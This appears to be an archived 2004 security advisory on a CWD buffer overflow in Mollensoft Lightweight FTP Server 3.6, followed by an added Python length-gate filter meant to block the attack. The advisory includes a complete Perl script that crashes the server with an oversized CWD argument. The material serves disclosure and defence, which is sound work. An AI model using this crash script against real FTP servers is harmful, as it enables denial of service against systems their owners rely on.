
mollensoftLightweight.txt

02 Jun 2004 | Reported by storm | Type: packetstorm | Source: packetstormsecurity.com

Mollensoft Lightweight FTP Server has a CWD buffer overflow vulnerability that can crash the server.

Code
`Mollensoft Lightweight FTP Server CWD Buffer Overflow   
------------------------------------------------------------------------   
  
  
Article reference:  
http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html  
  
  
SUMMARY  
  
STORM has discovered a security vulnerability in   
<http://www.mollensoft.com/product2.htm> Mollensoft Lightweight FTP Server.   
Mollensoft Lightweight FTP Server's support for the CWD command does not   
correctly verify that the argument of the CWD command doesn't overflow any of   
its internal buffers. This insufficient verification allows an authenticated   
(anonymous or otherwise) user to cause the FTP server to crash while trying to   
read an arbitrary memory location by issuing a malformed CWD command.   
  
  
DETAILS  
  
Vulnerable Systems:   
* Mollensoft Lightweight FTP Server version 3.6   
  
Vendor Response:   
BigAl (author) responded with the following:   
I wrote this particular app with Visual Basic and used an FTP ActiveX COM   
component and I am waiting for the component creator to get back to me   
regarding the fix. Unfortunately I cannot snip off any of the commands, as   
access to the command length is not available from the VB component using   
straight VB Code. I am working on moving to .Net so hopefully I can have a   
new FTP server out by fall time frame which is truly multi-threaded and   
totally coded by me.   
  
Exploit:   
#!/usr/bin/perl   
#   
# Mollensoft FTP Server CWD Buffer Overflow   
#   
  
use strict;   
use IO::Socket::INET;   
  
usage() unless (@ARGV == 2);   
  
my $host = shift(@ARGV);   
my $port = shift(@ARGV);   
  
# create the socket   
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,   
PeerPort=>$port);   
$socket or die "Cannot connect to host!\n";   
  
$socket->autoflush(1);   
  
# receive greeting   
my $repcode = "220 ";   
my $response = recv_reply($socket, $repcode);   
print $response;   
  
# send USER command   
#my $username = "%00" x 2041;   
my $username = "anonymous";   
print "USER $username\r\n";   
print $socket "USER $username\r\n";   
  
select(undef, undef, undef, 0.002); # sleep of 2 milliseconds   
  
# send PASS command   
my $password = "a\@b.com";   
print "PASS $password\r\n";   
print $socket "PASS $password\r\n";   
  
my $cmd = "CWD ";   
$cmd .= "A" x 224; # Value can range from 224 to 1018   
$cmd .= "\r\n";   
print "length: ".length($cmd)."\n";   
print $socket $cmd;   
  
$repcode = "";   
recv_reply($socket, $repcode);   
  
close($socket);   
exit(0);   
  
sub usage   
{   
    # print usage information   
    print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n   
<host> - The host to connect to   
<port> - The TCP port which the FTP server is listening on\n\n";   
    exit(1);   
}   
  
sub recv_reply   
{   
    # retrieve any reply   
    my $socket = shift;   
    my $repcode = shift;   
    $socket or die "Can't receive on socket\n";   
  
    my $res="";   
    while(<$socket>)   
    {   
        $res .= $_;   
        if (/$repcode/) { last; }   
    }   
    return $res;   
}   
  
  
ADDITIONAL INFORMATION  
SecurITeam would like to thank STORM for   
finding this vulnerability.  
  
  
Regards,   
Aviram Jenik  
Beyond Security Ltd.  
  
http://www.BeyondSecurity.com  
http://www.SecuriTeam.com  
  
  
  
  
  
====================   
====================   
  
DISCLAIMER:   
The information in this bulletin is provided "AS IS" without warranty of any   
kind.   
In no event shall we be liable for any damages whatsoever including direct,   
indirect, incidental, consequential, loss of business profits or special   
damages.   
`
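
The vendor response says the command length cannot be checked from inside the server, so the check can sit in front of it. The following is an added example, not part of the original advisory or of Mollensoft's code: a length gate for FTP control-channel lines, as a filtering proxy or IDS hook might apply it. The function names, the 200-byte argument cap, the 512-byte line cap and the reply strings are assumptions; only the 224 to 1018 range comes from the advisory.

```python
# Added example, not from the advisory: a length gate for FTP control-channel
# lines. Only the 224..1018 range comes from the advisory's PoC comment; the
# names, caps and reply strings below are assumptions.
from typing import NamedTuple, Optional

CRASH_MIN_ARG = 224   # smallest CWD argument length the advisory reports
CRASH_MAX_ARG = 1018  # largest CWD argument length the advisory reports
MAX_ARG_LEN = 200     # assumed policy cap, kept below the crash threshold
MAX_LINE_LEN = 512    # assumed cap on a whole control line, CRLF included


class Verdict(NamedTuple):
    allow: bool
    verb: str
    arg_len: int
    reply: Optional[bytes]  # sent to the client instead of forwarding the line


def check_command(line: bytes) -> Verdict:
    """Decide whether one raw control-channel line may reach the server."""
    if len(line) > MAX_LINE_LEN or not line.endswith(b"\r\n"):
        # Oversized or unterminated input never reaches the backend parser.
        return Verdict(False, "", len(line), b"500 Line too long or malformed.\r\n")
    verb, _, arg = line[:-2].partition(b" ")
    verb_s = verb.decode("ascii", "replace").upper()  # verbs are case-insensitive
    if len(arg) > MAX_ARG_LEN:
        return Verdict(False, verb_s, len(arg), b"501 Argument too long.\r\n")
    return Verdict(True, verb_s, len(arg), None)


def scan_session(lines):
    """Return (line_no, verb, arg_len) for every rejected line of a session."""
    verdicts = enumerate(map(check_command, lines), 1)
    return [(n, v.verb, v.arg_len) for n, v in verdicts if not v.allow]


# Constructed sample session (not captured traffic).
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS a@b.com\r\n",
    b"CWD /pub/incoming\r\n",
    b"cwd " + b"A" * CRASH_MIN_ARG + b"\r\n",  # lower bound, lower-case verb
    b"CWD " + b"A" * CRASH_MAX_ARG + b"\r\n",  # upper bound, exceeds MAX_LINE_LEN
]

if __name__ == "__main__":
    for hit in scan_session(SAMPLE):
        print("blocked line %d: verb=%r arg_len=%d" % hit)
```

A caller reading from a socket should buffer until it sees CRLF or has read more than `MAX_LINE_LEN` bytes before calling `check_command`, since the function treats an unterminated line as malformed.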
